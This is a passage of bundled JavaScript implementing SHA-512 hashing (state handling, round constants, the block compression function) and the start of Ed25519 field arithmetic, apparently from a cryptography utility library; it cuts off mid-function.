     */ SHA512.prototype.reset = function() {
        this._initState();
        this._bufferLength = 0;
        this._bytesHashed = 0;
        this._finished = false;
        return this;
    };
    /**
     * Cleans internal buffers and resets hash state.
     */ SHA512.prototype.clean = function() {
        $276678191c4bdb56$exports.wipe(this._buffer);
        $276678191c4bdb56$exports.wipe(this._tempHi);
        $276678191c4bdb56$exports.wipe(this._tempLo);
        this.reset();
    };
    /**
     * Updates hash state with the given data.
     *
     * Throws error when trying to update already finalized hash:
     * instance must be reset to update it again.
     */ SHA512.prototype.update = function(data, dataLength) {
        if (dataLength === void 0) dataLength = data.length;
        if (this._finished) throw new Error("SHA512: can't update because hash was finished.");
        var dataPos = 0;
        this._bytesHashed += dataLength;
        if (this._bufferLength > 0) {
            while(this._bufferLength < $2cc6b12a8ccb780d$exports.BLOCK_SIZE && dataLength > 0){
                this._buffer[this._bufferLength++] = data[dataPos++];
                dataLength--;
            }
            if (this._bufferLength === this.blockSize) {
                $2cc6b12a8ccb780d$var$hashBlocks(this._tempHi, this._tempLo, this._stateHi, this._stateLo, this._buffer, 0, this.blockSize);
                this._bufferLength = 0;
            }
        }
        if (dataLength >= this.blockSize) {
            dataPos = $2cc6b12a8ccb780d$var$hashBlocks(this._tempHi, this._tempLo, this._stateHi, this._stateLo, data, dataPos, dataLength);
            dataLength %= this.blockSize;
        }
        while(dataLength > 0){
            this._buffer[this._bufferLength++] = data[dataPos++];
            dataLength--;
        }
        return this;
    };
    /**
     * Finalizes hash state and puts hash into out.
     * If hash was already finalized, puts the same value.
     */ SHA512.prototype.finish = function(out) {
        if (!this._finished) {
            var bytesHashed = this._bytesHashed;
            var left = this._bufferLength;
            var bitLenHi = bytesHashed / 0x20000000 | 0;
            var bitLenLo = bytesHashed << 3;
            var padLength = bytesHashed % 128 < 112 ? 128 : 256;
            this._buffer[left] = 0x80;
            for(var i = left + 1; i < padLength - 8; i++)this._buffer[i] = 0;
            $ddd89ca0ca71c6d3$exports.writeUint32BE(bitLenHi, this._buffer, padLength - 8);
            $ddd89ca0ca71c6d3$exports.writeUint32BE(bitLenLo, this._buffer, padLength - 4);
            $2cc6b12a8ccb780d$var$hashBlocks(this._tempHi, this._tempLo, this._stateHi, this._stateLo, this._buffer, 0, padLength);
            this._finished = true;
        }
        for(var i = 0; i < this.digestLength / 8; i++){
            $ddd89ca0ca71c6d3$exports.writeUint32BE(this._stateHi[i], out, i * 8);
            $ddd89ca0ca71c6d3$exports.writeUint32BE(this._stateLo[i], out, i * 8 + 4);
        }
        return this;
    };
    /**
     * Returns the final hash digest.
     */ SHA512.prototype.digest = function() {
        var out = new Uint8Array(this.digestLength);
        this.finish(out);
        return out;
    };
    /**
     * Function useful for HMAC/PBKDF2 optimization. Returns hash state to be
     * used with restoreState(). Only chain value is saved, not buffers or
     * other state variables.
     */ SHA512.prototype.saveState = function() {
        if (this._finished) throw new Error("SHA256: cannot save finished state");
        return {
            stateHi: new Int32Array(this._stateHi),
            stateLo: new Int32Array(this._stateLo),
            buffer: this._bufferLength > 0 ? new Uint8Array(this._buffer) : undefined,
            bufferLength: this._bufferLength,
            bytesHashed: this._bytesHashed
        };
    };
    /**
     * Function useful for HMAC/PBKDF2 optimization. Restores state saved by
     * saveState() and sets bytesHashed to the given value.
     */ SHA512.prototype.restoreState = function(savedState) {
        this._stateHi.set(savedState.stateHi);
        this._stateLo.set(savedState.stateLo);
        this._bufferLength = savedState.bufferLength;
        if (savedState.buffer) this._buffer.set(savedState.buffer);
        this._bytesHashed = savedState.bytesHashed;
        this._finished = false;
        return this;
    };
    /**
     * Cleans state returned by saveState().
     */ SHA512.prototype.cleanSavedState = function(savedState) {
        $276678191c4bdb56$exports.wipe(savedState.stateHi);
        $276678191c4bdb56$exports.wipe(savedState.stateLo);
        if (savedState.buffer) $276678191c4bdb56$exports.wipe(savedState.buffer);
        savedState.bufferLength = 0;
        savedState.bytesHashed = 0;
    };
    return SHA512;
}();
$2cc6b12a8ccb780d$exports.SHA512 = $2cc6b12a8ccb780d$var$SHA512;
// Constants
var $2cc6b12a8ccb780d$var$K = new Int32Array([
    0x428a2f98,
    0xd728ae22,
    0x71374491,
    0x23ef65cd,
    0xb5c0fbcf,
    0xec4d3b2f,
    0xe9b5dba5,
    0x8189dbbc,
    0x3956c25b,
    0xf348b538,
    0x59f111f1,
    0xb605d019,
    0x923f82a4,
    0xaf194f9b,
    0xab1c5ed5,
    0xda6d8118,
    0xd807aa98,
    0xa3030242,
    0x12835b01,
    0x45706fbe,
    0x243185be,
    0x4ee4b28c,
    0x550c7dc3,
    0xd5ffb4e2,
    0x72be5d74,
    0xf27b896f,
    0x80deb1fe,
    0x3b1696b1,
    0x9bdc06a7,
    0x25c71235,
    0xc19bf174,
    0xcf692694,
    0xe49b69c1,
    0x9ef14ad2,
    0xefbe4786,
    0x384f25e3,
    0x0fc19dc6,
    0x8b8cd5b5,
    0x240ca1cc,
    0x77ac9c65,
    0x2de92c6f,
    0x592b0275,
    0x4a7484aa,
    0x6ea6e483,
    0x5cb0a9dc,
    0xbd41fbd4,
    0x76f988da,
    0x831153b5,
    0x983e5152,
    0xee66dfab,
    0xa831c66d,
    0x2db43210,
    0xb00327c8,
    0x98fb213f,
    0xbf597fc7,
    0xbeef0ee4,
    0xc6e00bf3,
    0x3da88fc2,
    0xd5a79147,
    0x930aa725,
    0x06ca6351,
    0xe003826f,
    0x14292967,
    0x0a0e6e70,
    0x27b70a85,
    0x46d22ffc,
    0x2e1b2138,
    0x5c26c926,
    0x4d2c6dfc,
    0x5ac42aed,
    0x53380d13,
    0x9d95b3df,
    0x650a7354,
    0x8baf63de,
    0x766a0abb,
    0x3c77b2a8,
    0x81c2c92e,
    0x47edaee6,
    0x92722c85,
    0x1482353b,
    0xa2bfe8a1,
    0x4cf10364,
    0xa81a664b,
    0xbc423001,
    0xc24b8b70,
    0xd0f89791,
    0xc76c51a3,
    0x0654be30,
    0xd192e819,
    0xd6ef5218,
    0xd6990624,
    0x5565a910,
    0xf40e3585,
    0x5771202a,
    0x106aa070,
    0x32bbd1b8,
    0x19a4c116,
    0xb8d2d0c8,
    0x1e376c08,
    0x5141ab53,
    0x2748774c,
    0xdf8eeb99,
    0x34b0bcb5,
    0xe19b48a8,
    0x391c0cb3,
    0xc5c95a63,
    0x4ed8aa4a,
    0xe3418acb,
    0x5b9cca4f,
    0x7763e373,
    0x682e6ff3,
    0xd6b2b8a3,
    0x748f82ee,
    0x5defb2fc,
    0x78a5636f,
    0x43172f60,
    0x84c87814,
    0xa1f0ab72,
    0x8cc70208,
    0x1a6439ec,
    0x90befffa,
    0x23631e28,
    0xa4506ceb,
    0xde82bde9,
    0xbef9a3f7,
    0xb2c67915,
    0xc67178f2,
    0xe372532b,
    0xca273ece,
    0xea26619c,
    0xd186b8c7,
    0x21c0c207,
    0xeada7dd6,
    0xcde0eb1e,
    0xf57d4f7f,
    0xee6ed178,
    0x06f067aa,
    0x72176fba,
    0x0a637dc5,
    0xa2c898a6,
    0x113f9804,
    0xbef90dae,
    0x1b710b35,
    0x131c471b,
    0x28db77f5,
    0x23047d84,
    0x32caab7b,
    0x40c72493,
    0x3c9ebe0a,
    0x15c9bebc,
    0x431d67c4,
    0x9c100d4c,
    0x4cc5d4be,
    0xcb3e42b6,
    0x597f299c,
    0xfc657e2a,
    0x5fcb6fab,
    0x3ad6faec,
    0x6c44198c,
    0x4a475817
]);
function $2cc6b12a8ccb780d$var$hashBlocks(wh, wl, hh, hl, m, pos, len) {
    var ah0 = hh[0], ah1 = hh[1], ah2 = hh[2], ah3 = hh[3], ah4 = hh[4], ah5 = hh[5], ah6 = hh[6], ah7 = hh[7], al0 = hl[0], al1 = hl[1], al2 = hl[2], al3 = hl[3], al4 = hl[4], al5 = hl[5], al6 = hl[6], al7 = hl[7];
    var h, l;
    var th, tl;
    var a, b, c, d;
    while(len >= 128){
        for(var i = 0; i < 16; i++){
            var j = 8 * i + pos;
            wh[i] = $ddd89ca0ca71c6d3$exports.readUint32BE(m, j);
            wl[i] = $ddd89ca0ca71c6d3$exports.readUint32BE(m, j + 4);
        }
        for(var i = 0; i < 80; i++){
            var bh0 = ah0;
            var bh1 = ah1;
            var bh2 = ah2;
            var bh3 = ah3;
            var bh4 = ah4;
            var bh5 = ah5;
            var bh6 = ah6;
            var bh7 = ah7;
            var bl0 = al0;
            var bl1 = al1;
            var bl2 = al2;
            var bl3 = al3;
            var bl4 = al4;
            var bl5 = al5;
            var bl6 = al6;
            var bl7 = al7;
            // add
            h = ah7;
            l = al7;
            a = l & 0xffff;
            b = l >>> 16;
            c = h & 0xffff;
            d = h >>> 16;
            // Sigma1
            h = (ah4 >>> 14 | al4 << 18) ^ (ah4 >>> 18 | al4 << 14) ^ (al4 >>> 9 | ah4 << 23);
            l = (al4 >>> 14 | ah4 << 18) ^ (al4 >>> 18 | ah4 << 14) ^ (ah4 >>> 9 | al4 << 23);
            a += l & 0xffff;
            b += l >>> 16;
            c += h & 0xffff;
            d += h >>> 16;
            // Ch
            h = ah4 & ah5 ^ ~ah4 & ah6;
            l = al4 & al5 ^ ~al4 & al6;
            a += l & 0xffff;
            b += l >>> 16;
            c += h & 0xffff;
            d += h >>> 16;
            // K
            h = $2cc6b12a8ccb780d$var$K[i * 2];
            l = $2cc6b12a8ccb780d$var$K[i * 2 + 1];
            a += l & 0xffff;
            b += l >>> 16;
            c += h & 0xffff;
            d += h >>> 16;
            // w
            h = wh[i % 16];
            l = wl[i % 16];
            a += l & 0xffff;
            b += l >>> 16;
            c += h & 0xffff;
            d += h >>> 16;
            b += a >>> 16;
            c += b >>> 16;
            d += c >>> 16;
            th = c & 0xffff | d << 16;
            tl = a & 0xffff | b << 16;
            // add
            h = th;
            l = tl;
            a = l & 0xffff;
            b = l >>> 16;
            c = h & 0xffff;
            d = h >>> 16;
            // Sigma0
            h = (ah0 >>> 28 | al0 << 4) ^ (al0 >>> 2 | ah0 << 30) ^ (al0 >>> 7 | ah0 << 25);
            l = (al0 >>> 28 | ah0 << 4) ^ (ah0 >>> 2 | al0 << 30) ^ (ah0 >>> 7 | al0 << 25);
            a += l & 0xffff;
            b += l >>> 16;
            c += h & 0xffff;
            d += h >>> 16;
            // Maj
            h = ah0 & ah1 ^ ah0 & ah2 ^ ah1 & ah2;
            l = al0 & al1 ^ al0 & al2 ^ al1 & al2;
            a += l & 0xffff;
            b += l >>> 16;
            c += h & 0xffff;
            d += h >>> 16;
            b += a >>> 16;
            c += b >>> 16;
            d += c >>> 16;
            bh7 = c & 0xffff | d << 16;
            bl7 = a & 0xffff | b << 16;
            // add
            h = bh3;
            l = bl3;
            a = l & 0xffff;
            b = l >>> 16;
            c = h & 0xffff;
            d = h >>> 16;
            h = th;
            l = tl;
            a += l & 0xffff;
            b += l >>> 16;
            c += h & 0xffff;
            d += h >>> 16;
            b += a >>> 16;
            c += b >>> 16;
            d += c >>> 16;
            bh3 = c & 0xffff | d << 16;
            bl3 = a & 0xffff | b << 16;
            ah1 = bh0;
            ah2 = bh1;
            ah3 = bh2;
            ah4 = bh3;
            ah5 = bh4;
            ah6 = bh5;
            ah7 = bh6;
            ah0 = bh7;
            al1 = bl0;
            al2 = bl1;
            al3 = bl2;
            al4 = bl3;
            al5 = bl4;
            al6 = bl5;
            al7 = bl6;
            al0 = bl7;
            if (i % 16 === 15) for(var j = 0; j < 16; j++){
                // add
                h = wh[j];
                l = wl[j];
                a = l & 0xffff;
                b = l >>> 16;
                c = h & 0xffff;
                d = h >>> 16;
                h = wh[(j + 9) % 16];
                l = wl[(j + 9) % 16];
                a += l & 0xffff;
                b += l >>> 16;
                c += h & 0xffff;
                d += h >>> 16;
                // sigma0
                th = wh[(j + 1) % 16];
                tl = wl[(j + 1) % 16];
                h = (th >>> 1 | tl << 31) ^ (th >>> 8 | tl << 24) ^ th >>> 7;
                l = (tl >>> 1 | th << 31) ^ (tl >>> 8 | th << 24) ^ (tl >>> 7 | th << 25);
                a += l & 0xffff;
                b += l >>> 16;
                c += h & 0xffff;
                d += h >>> 16;
                // sigma1
                th = wh[(j + 14) % 16];
                tl = wl[(j + 14) % 16];
                h = (th >>> 19 | tl << 13) ^ (tl >>> 29 | th << 3) ^ th >>> 6;
                l = (tl >>> 19 | th << 13) ^ (th >>> 29 | tl << 3) ^ (tl >>> 6 | th << 26);
                a += l & 0xffff;
                b += l >>> 16;
                c += h & 0xffff;
                d += h >>> 16;
                b += a >>> 16;
                c += b >>> 16;
                d += c >>> 16;
                wh[j] = c & 0xffff | d << 16;
                wl[j] = a & 0xffff | b << 16;
            }
        }
        // add
        h = ah0;
        l = al0;
        a = l & 0xffff;
        b = l >>> 16;
        c = h & 0xffff;
        d = h >>> 16;
        h = hh[0];
        l = hl[0];
        a += l & 0xffff;
        b += l >>> 16;
        c += h & 0xffff;
        d += h >>> 16;
        b += a >>> 16;
        c += b >>> 16;
        d += c >>> 16;
        hh[0] = ah0 = c & 0xffff | d << 16;
        hl[0] = al0 = a & 0xffff | b << 16;
        h = ah1;
        l = al1;
        a = l & 0xffff;
        b = l >>> 16;
        c = h & 0xffff;
        d = h >>> 16;
        h = hh[1];
        l = hl[1];
        a += l & 0xffff;
        b += l >>> 16;
        c += h & 0xffff;
        d += h >>> 16;
        b += a >>> 16;
        c += b >>> 16;
        d += c >>> 16;
        hh[1] = ah1 = c & 0xffff | d << 16;
        hl[1] = al1 = a & 0xffff | b << 16;
        h = ah2;
        l = al2;
        a = l & 0xffff;
        b = l >>> 16;
        c = h & 0xffff;
        d = h >>> 16;
        h = hh[2];
        l = hl[2];
        a += l & 0xffff;
        b += l >>> 16;
        c += h & 0xffff;
        d += h >>> 16;
        b += a >>> 16;
        c += b >>> 16;
        d += c >>> 16;
        hh[2] = ah2 = c & 0xffff | d << 16;
        hl[2] = al2 = a & 0xffff | b << 16;
        h = ah3;
        l = al3;
        a = l & 0xffff;
        b = l >>> 16;
        c = h & 0xffff;
        d = h >>> 16;
        h = hh[3];
        l = hl[3];
        a += l & 0xffff;
        b += l >>> 16;
        c += h & 0xffff;
        d += h >>> 16;
        b += a >>> 16;
        c += b >>> 16;
        d += c >>> 16;
        hh[3] = ah3 = c & 0xffff | d << 16;
        hl[3] = al3 = a & 0xffff | b << 16;
        h = ah4;
        l = al4;
        a = l & 0xffff;
        b = l >>> 16;
        c = h & 0xffff;
        d = h >>> 16;
        h = hh[4];
        l = hl[4];
        a += l & 0xffff;
        b += l >>> 16;
        c += h & 0xffff;
        d += h >>> 16;
        b += a >>> 16;
        c += b >>> 16;
        d += c >>> 16;
        hh[4] = ah4 = c & 0xffff | d << 16;
        hl[4] = al4 = a & 0xffff | b << 16;
        h = ah5;
        l = al5;
        a = l & 0xffff;
        b = l >>> 16;
        c = h & 0xffff;
        d = h >>> 16;
        h = hh[5];
        l = hl[5];
        a += l & 0xffff;
        b += l >>> 16;
        c += h & 0xffff;
        d += h >>> 16;
        b += a >>> 16;
        c += b >>> 16;
        d += c >>> 16;
        hh[5] = ah5 = c & 0xffff | d << 16;
        hl[5] = al5 = a & 0xffff | b << 16;
        h = ah6;
        l = al6;
        a = l & 0xffff;
        b = l >>> 16;
        c = h & 0xffff;
        d = h >>> 16;
        h = hh[6];
        l = hl[6];
        a += l & 0xffff;
        b += l >>> 16;
        c += h & 0xffff;
        d += h >>> 16;
        b += a >>> 16;
        c += b >>> 16;
        d += c >>> 16;
        hh[6] = ah6 = c & 0xffff | d << 16;
        hl[6] = al6 = a & 0xffff | b << 16;
        h = ah7;
        l = al7;
        a = l & 0xffff;
        b = l >>> 16;
        c = h & 0xffff;
        d = h >>> 16;
        h = hh[7];
        l = hl[7];
        a += l & 0xffff;
        b += l >>> 16;
        c += h & 0xffff;
        d += h >>> 16;
        b += a >>> 16;
        c += b >>> 16;
        d += c >>> 16;
        hh[7] = ah7 = c & 0xffff | d << 16;
        hl[7] = al7 = a & 0xffff | b << 16;
        pos += 128;
        len -= 128;
    }
    return pos;
}
function $2cc6b12a8ccb780d$var$hash(data) {
    var h = new $2cc6b12a8ccb780d$var$SHA512();
    h.update(data);
    var digest = h.digest();
    h.clean();
    return digest;
}
$2cc6b12a8ccb780d$exports.hash = $2cc6b12a8ccb780d$var$hash;



$a1d7ebd43ba0a83c$exports.SIGNATURE_LENGTH = 64;
$a1d7ebd43ba0a83c$exports.PUBLIC_KEY_LENGTH = 32;
$a1d7ebd43ba0a83c$exports.SECRET_KEY_LENGTH = 64;
$a1d7ebd43ba0a83c$exports.SEED_LENGTH = 32;
// Returns new zero-filled 16-element GF (Float64Array).
// If passed an array of numbers, prefills the returned
// array with them.
//
// We use Float64Array, because we need 48-bit numbers
// for this implementation.
function $a1d7ebd43ba0a83c$var$gf(init) {
    const r = new Float64Array(16);
    if (init) for(let i = 0; i < init.length; i++)r[i] = init[i];
    return r;
}
// Base point.
const $a1d7ebd43ba0a83c$var$_9 = new Uint8Array(32);
$a1d7ebd43ba0a83c$var$_9[0] = 9;
const $a1d7ebd43ba0a83c$var$gf0 = $a1d7ebd43ba0a83c$var$gf();
const $a1d7ebd43ba0a83c$var$gf1 = $a1d7ebd43ba0a83c$var$gf([
    1
]);
const $a1d7ebd43ba0a83c$var$D = $a1d7ebd43ba0a83c$var$gf([
    0x78a3,
    0x1359,
    0x4dca,
    0x75eb,
    0xd8ab,
    0x4141,
    0x0a4d,
    0x0070,
    0xe898,
    0x7779,
    0x4079,
    0x8cc7,
    0xfe73,
    0x2b6f,
    0x6cee,
    0x5203
]);
const $a1d7ebd43ba0a83c$var$D2 = $a1d7ebd43ba0a83c$var$gf([
    0xf159,
    0x26b2,
    0x9b94,
    0xebd6,
    0xb156,
    0x8283,
    0x149a,
    0x00e0,
    0xd130,
    0xeef3,
    0x80f2,
    0x198e,
    0xfce7,
    0x56df,
    0xd9dc,
    0x2406
]);
const $a1d7ebd43ba0a83c$var$X = $a1d7ebd43ba0a83c$var$gf([
    0xd51a,
    0x8f25,
    0x2d60,
    0xc956,
    0xa7b2,
    0x9525,
    0xc760,
    0x692c,
    0xdc5c,
    0xfdd6,
    0xe231,
    0xc0a4,
    0x53fe,
    0xcd6e,
    0x36d3,
    0x2169
]);
const $a1d7ebd43ba0a83c$var$Y = $a1d7ebd43ba0a83c$var$gf([
    0x6658,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666
]);
const $a1d7ebd43ba0a83c$var$I = $a1d7ebd43ba0a83c$var$gf([
    0xa0b0,
    0x4a0e,
    0x1b27,
    0xc4ee,
    0xe478,
    0xad2f,
    0x1806,
    0x2f43,
    0xd7a7,
    0x3dfb,
    0x0099,
    0x2b4d,
    0xdf0b,
    0x4fc1,
    0x2480,
    0x2b83
]);
function $a1d7ebd43ba0a83c$var$set25519(r, a) {
    for(let i = 0; i < 16; i++)r[i] = a[i] | 0;
}
function $a1d7ebd43ba0a83c$var$car25519(o) {
    let c = 1;
    for(let i = 0; i < 16; i++){
        let v = o[i] + c + 65535;
        c = Math.floor(v / 65536);
        o[i] = v - c * 65536;
    }
    o[0] += c - 1 + 37 * (c - 1);
}
function $a1d7ebd43ba0a83c$var$sel25519(p, q, b) {
    const c = ~(b - 1);
    for(let i = 0; i < 16; i++){
        const t = c & (p[i] ^ q[i]);
        p[i] ^= t;
        q[i] ^= t;
    }
}
function $a1d7ebd43ba0a83c$var$pack25519(o, n) {
    const m = $a1d7ebd43ba0a83c$var$gf();
    const t = $a1d7ebd43ba0a83c$var$gf();
    for(let i = 0; i < 16; i++)t[i] = n[i];
    $a1d7ebd43ba0a83c$var$car25519(t);
    $a1d7ebd43ba0a83c$var$car25519(t);
    $a1d7ebd43ba0a83c$var$car25519(t);
    for(let j = 0; j < 2; j++){
        m[0] = t[0] - 0xffed;
        for(let i = 1; i < 15; i++){
            m[i] = t[i] - 0xffff - (m[i - 1] >> 16 & 1);
            m[i - 1] &= 0xffff;
        }
        m[15] = t[15] - 0x7fff - (m[14] >> 16 & 1);
        const b = m[15] >> 16 & 1;
        m[14] &= 0xffff;
        $a1d7ebd43ba0a83c$var$sel25519(t, m, 1 - b);
    }
    for(let i = 0; i < 16; i++){
        o[2 * i] = t[i] & 0xff;
        o[2 * i + 1] = t[i] >> 8;
    }
}
function $a1d7ebd43ba0a83c$var$verify32(x, y) {
    let d = 0;
    for(let i = 0; i < 32; i++)d |= x[i] ^ y[i];
    return (1 & d - 1 >>> 8) - 1;
}
function $a1d7ebd43ba0a83c$var$neq25519(a, b) {
    const c = new Uint8Array(32);
    const d = new Uint8Array(32);
    $a1d7ebd43ba0a83c$var$pack25519(c, a);
    $a1d7ebd43ba0a83c$var$pack25519(d, b);
    return $a1d7ebd43ba0a83c$var$verify32(c, d);
}
function $a1d7ebd43ba0a83c$var$par25519(a) {
    const d = new Uint8Array(32);
    $a1d7ebd43ba0a83c$var$pack25519(d, a);
    return d[0] & 1;
}
function $a1d7ebd43ba0a83c$var$unpack25519(o, n) {
    for(let i = 0; i < 16; i++)o[i] = n[2 * i] + (n[2 * i + 1] << 8);
    o[15] &= 0x7fff;
}
function $a1d7ebd43ba0a83c$var$add(o, a, b) {
    for(let i = 0; i < 16; i++)o[i] = a[i] + b[i];
}
function $a1d7ebd43ba0a83c$var$sub(o, a, b) {
    for(let i = 0; i < 16; i++)o[i] = a[i] - b[i];
}
function $a1d7ebd43ba0a83c$var$mul(o, a, b) {
    let v, c, t0 = 0, t1 = 0, t2 = 0, t3 = 0, t4 = 0, t5 = 0, t6 = 0, t7 = 0, t8 = 0, t9 = 0, t10 = 0, t11 = 0, t12 = 0, t13 = 0, t14 = 0, t15 = 0, t16 = 0, t17 = 0, t18 = 0, t19 = 0, t20 = 0, t21 = 0, t22 = 0, t23 = 0, t24 = 0, t25 = 0, t26 = 0, t27 = 0, t28 = 0, t29 = 0, t30 = 0, b0 = b[0], b1 = b[1], b2 = b[2], b3 = b[3], b4 = b[4], b5 = b[5], b6 = b[6], b7 = b[7], b8 = b[8], b9 = b[9], b10 = b[10], b11 = b[11], b12 = b[12], b13 = b[13], b14 = b[14], b15 = b[15];
    v = a[0];
    t0 += v * b0;
    t1 += v * b1;
    t2 += v * b2;
    t3 += v * b3;
    t4 += v * b4;
    t5 += v * b5;
    t6 += v * b6;
    t7 += v * b7;
    t8 += v * b8;
    t9 += v * b9;
    t10 += v * b10;
    t11 += v * b11;
    t12 += v * b12;
    t13 += v * b13;
    t14 += v * b14;
    t15 += v * b15;
    v = a[1];
    t1 += v * b0;
    t2 += v * b1;
    t3 += v * b2;
    t4 += v * b3;
    t5 += v * b4;
    t6 += v * b5;
    t7 += v * b6;
    t8 += v * b7;
    t9 += v * b8;
    t10 += v * b9;
    t11 += v * b10;
    t12 += v * b11;
    t13 += v * b12;
    t14 += v * b13;
    t15 += v * b14;
    t16 += v * b15;
    v = a[2];
    t2 += v * b0;
    t3 += v * b1;
    t4 += v * b2;
    t5 += v * b3;
    t6 += v * b4;
    t7 += v * b5;
    t8 += v * b6;
    t9 += v * b7;
    t10 += v * b8;
    t11 += v * b9;
    t12 += v * b10;
    t13 += v * b11;
    t14 += v * b12;
    t15 += v * b13;
    t16 += v * b14;
    t17 += v * b15;
    v = a[3];
    t3 += v * b0;
    t4 += v * b1;
    t5 += v * b2;
    t6 += v * b3;
    t7 += v * b4;
    t8 += v * b5;
    t9 += v * b6;
    t10 += v * b7;
    t11 += v * b8;
    t12 += v * b9;
    t13 += v * b10;
    t14 += v * b11;
    t15 += v * b12;
    t16 += v * b13;
    t17 += v * b14;
    t18 += v * b15;
    v = a[4];
    t4 += v * b0;
    t5 += v * b1;
    t6 += v * b2;
    t7 += v * b3;
    t8 += v * b4;
    t9 += v * b5;
    t10 += v * b6;
    t11 += v * b7;
    t12 += v * b8;
    t13 += v * b9;
    t14 += v * b10;
    t15 += v * b11;
    t16 += v * b12;
    t17 += v * b13;
    t18 += v * b14;
    t19 += v * b15;
    v = a[5];
    t5 += v * b0;
    t6 += v * b1;
    t7 += v * b2;
    t8 += v * b3;
    t9 += v * b4;
    t10 += v * b5;
    t11 += v * b6;
    t12 += v * b7;
    t13 += v * b8;
    t14 += v * b9;
    t15 += v * b10;
    t16 += v * b11;
    t17 += v * b12;
    t18 += v * b13;
    t19 += v * b14;
    t20 += v * b15;
    v = a[6];
    t6 += v * b0;
    t7 += v * b1;
    t8 += v * b2;
    t9 += v * b3;
    t10 += v * b4;
    t11 += v * b5;
    t12 += v * b6;
    t13 += v * b7;
    t14 += v * b8;
    t15 += v * b9;
    t16 += v * b10;
    t17 += v * b11;
    t18 += v * b12;
    t19 += v * b13;
    t20 += v * b14;
    t21 += v * b15;
    v = a[7];
    t7 += v * b0;
    t8 += v * b1;
    t9 += v * b2;
    t10 += v * b3;
    t11 += v * b4;
    t12 += v * b5;
    t13 += v * b6;
    t14 += v * b7;
    t15 += v * b8;
    t16 += v * b9;
    t17 += v * b10;
    t18 += v * b11;
    t19 += v * b12;
    t20 += v * b13;
    t21 += v * b14;
    t22 += v * b15;
    v = a[8];
    t8 += v * b0;
    t9 += v * b1;
    t10 += v * b2;
    t11 += v * b3;
    t12 += v * b4;
    t13 += v * b5;
    t14 += v * b6;
    t15 += v * b7;
    t16 += v * b8;
    t17 += v * b9;
    t18 += v * b10;
    t19 += v * b11;
    t20 += v * b12;
    t21 += v * b13;
    t22 += v * b14;
    t23 += v * b15;
    v = a[9];
    t9 += v * b0;
    t10 += v * b1;
    t11 += v * b2;
    t12 += v * b3;
    t13 += v * b4;
    t14 += v * b5;
    t15 += v * b6;
    t16 += v * b7;
    t17 += v * b8;
    t18 += v * b9;
    t19 += v * b10;
    t20 += v * b11;
    t21 += v * b12;
    t22 += v * b13;
    t23 += v * b14;
    t24 += v * b15;
    v = a[10];
    t10 += v * b0;
    t11 += v * b1;
    t12 += v * b2;
    t13 += v * b3;
    t14 += v * b4;
    t15 += v * b5;
    t16 += v * b6;
    t17 += v * b7;
    t18 += v * b8;
    t19 += v * b9;
    t20 += v * b10;
    t21 += v * b11;
    t22 += v * b12;
    t23 += v * b13;
    t24 += v * b14;
    t25 += v * b15;
    v = a[11];
    t11 += v * b0;
    t12 += v * b1;
    t13 += v * b2;
    t14 += v * b3;
    t15 += v * b4;
    t16 += v * b5;
    t17 += v * b6;
    t18 += v * b7;
    t19 += v * b8;
    t20 += v * b9;
    t21 += v * b10;
    t22 += v * b11;
    t23 += v * b12;
    t24 += v * b13;
    t25 += v * b14;
    t26 += v * b15;
    v = a[12];
    t12 += v * b0;
    t13 += v * b1;
    t14 += v * b2;
    t15 += v * b3;
    t16 += v * b4;
    t17 += v * b5;
    t18 += v * b6;
    t19 += v * b7;
    t20 += v * b8;
    t21 += v * b9;
    t22 += v * b10;
    t23 += v * b11;
    t24 += v * b12;
    t25 += v * b13;
    t26 += v * b14;
    t27 += v * b15;
    v = a[13];
    t13 += v * b0;
    t14 += v * b1;
    t15 += v * b2;
    t16 += v * b3;
    t17 += v * b4;
    t18 += v * b5;
    t19 += v * b6;
    t20 += v * b7;
    t21 += v * b8;
    t22 += v * b9;
    t23 += v * b10;
    t24 += v * b11;
    t25 += v * b12;
    t26 += v * b13;
    t27 += v * b14;
    t28 += v * b15;
    v = a[14];
    t14 += v * b0;
    t15 += v * b1;
    t16 += v * b2;
    t17 += v * b3;
    t18 += v * b4;
    t19 += v * b5;
    t20 += v * b6;
    t21 += v * b7;
    t22 += v * b8;
    t23 += v * b9;
    t24 += v * b10;
    t25 += v * b11;
    t26 += v * b12;
    t27 += v * b13;
    t28 += v * b14;
    t29 += v * b15;
    v = a[15];
    t15 += v * b0;
    t16 += v * b1;
    t17 += v * b2;
    t18 += v * b3;
    t19 += v * b4;
    t20 += v * b5;
    t21 += v * b6;
    t22 += v * b7;
    t23 += v * b8;
    t24 += v * b9;
    t25 += v * b10;
    t26 += v * b11;
    t27 += v * b12;
    t28 += v * b13;
    t29 += v * b14;
    t30 += v * b15;
    t0 += 38 * t16;
    t1 += 38 * t17;
    t2 += 38 * t18;
    t3 += 38 * t19;
    t4 += 38 * t20;
    t5 += 38 * t21;
    t6 += 38 * t22;
    t7 += 38 * t23;
    t8 += 38 * t24;
    t9 += 38 * t25;
    t10 += 38 * t26;
    t11 += 38 * t27;
    t12 += 38 * t28;
    t13 += 38 * t29;
    t14 += 38 * t30;
    // t15 left as is
    // first car
    c = 1;
    v = t0 + c + 65535;
    c = Math.floor(v / 65536);
    t0 = v - c * 65536;
    v = t1 + c + 65535;
    c = Math.floor(v / 65536);
    t1 = v - c * 65536;
    v = t2 + c + 65535;
    c = Math.floor(v / 65536);
    t2 = v - c * 65536;
    v = t3 + c + 65535;
    c = Math.floor(v / 65536);
    t3 = v - c * 65536;
    v = t4 + c + 65535;
    c = Math.floor(v / 65536);
    t4 = v - c * 65536;
    v = t5 + c + 65535;
    c = Math.floor(v / 65536);
    t5 = v - c * 65536;
    v = t6 + c + 65535;
    c = Math.floor(v / 65536);
    t6 = v - c * 65536;
    v = t7 + c + 65535;
    c = Math.floor(v / 65536);
    t7 = v - c * 65536;
    v = t8 + c + 65535;
    c = Math.floor(v / 65536);
    t8 = v - c * 65536;
    v = t9 + c + 65535;
    c = Math.floor(v / 65536);
    t9 = v - c * 65536;
    v = t10 + c + 65535;
    c = Math.floor(v / 65536);
    t10 = v - c * 65536;
    v = t11 + c + 65535;
    c = Math.floor(v / 65536);
    t11 = v - c * 65536;
    v = t12 + c + 65535;
    c = Math.floor(v / 65536);
    t12 = v - c * 65536;
    v = t13 + c + 65535;
    c = Math.floor(v / 65536);
    t13 = v - c * 65536;
    v = t14 + c + 65535;
    c = Math.floor(v / 65536);
